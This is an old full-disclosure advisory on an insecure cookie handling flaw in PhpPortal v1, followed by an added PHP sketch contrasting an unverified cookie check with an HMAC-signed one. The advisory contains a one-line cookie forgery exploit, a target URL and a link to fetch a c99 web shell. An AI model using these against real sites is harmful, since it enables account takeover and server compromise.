Related information
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] [NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-20090622]
[Full-disclosure] [DSF-02-2009] - Zoki Catalog SQL Injection
DirectAdmin <= v1.33.6 XSS vuln.
(GET var 'name') BLIND SQL INJECTION EXPLOIT --FretsWeb 1.2-->

From: ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com>
Date: 21.06.2009
Subject: PhpPortal v1 Insecure Cookie Handling Vulnerability

########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################
Author : xhaxckerx
Special Thankz : yasin
site : http://www.c99.mobi
Script : http://phportal.mertindualari.com
########################################################
Exploit;
javascript:document.cookie="kulladi=[Username];path=/";
Enter..
Go To;
http://target.com/uye_paneli.php?islem=bilgilerim
if you need shell : http://www.c99.mobi/c99.txt
########################################################
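
The advisory implies that PhpPortal takes the logged-in user from the `kulladi` cookie without verifying it. The sketch below is an added example, not PhpPortal's code or the advisory author's: it contrasts that assumed pattern with an HMAC-signed cookie check, and every function name and the key handling are hypothetical.

```php
<?php
// Added example, not PhpPortal source. Only the cookie name "kulladi" comes
// from the advisory; all function names and the key handling are hypothetical.

// Assumed vulnerable pattern: identity is whatever the client-set cookie says.
function current_user_insecure(array $cookies): ?string
{
    $name = $cookies['kulladi'] ?? '';
    return (is_string($name) && $name !== '') ? $name : null;
}

// Hardened issue step: value is base64(user).expiry.HMAC, keyed server-side.
function issue_cookie(string $user, int $ttl, string $key, ?int $now = null): string
{
    $payload = base64_encode($user) . '.' . (($now ?? time()) + $ttl);
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

// Hardened check: reject anything whose MAC does not verify or that expired.
function current_user_signed(array $cookies, string $key, ?int $now = null): ?string
{
    $raw = $cookies['kulladi'] ?? '';
    $parts = is_string($raw) ? explode('.', $raw) : [];
    if (count($parts) !== 3) {
        return null;
    }
    [$b64, $expires, $mac] = $parts;
    $expected = hash_hmac('sha256', $b64 . '.' . $expires, $key);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    if (!ctype_digit($expires) || (int) $expires < ($now ?? time())) {
        return null;
    }
    $user = base64_decode($b64, true);
    return ($user === false || $user === '') ? null : $user;
}

// Constructed demo values.
$key    = random_bytes(32);              // in practice: a stored server secret
$forged = ['kulladi' => 'someuser'];     // cookie typed in by the client
$issued = ['kulladi' => issue_cookie('someuser', 3600, $key)];

var_dump(current_user_insecure($forged));      // accepts the forged value
var_dump(current_user_signed($forged, $key));  // rejects it
var_dump(current_user_signed($issued, $key));  // accepts the server-issued one
```

Keeping the username in a server-side session (`session_start()` and `$_SESSION`) avoids carrying identity in the cookie at all; the signed form is for cases where the value must live client-side.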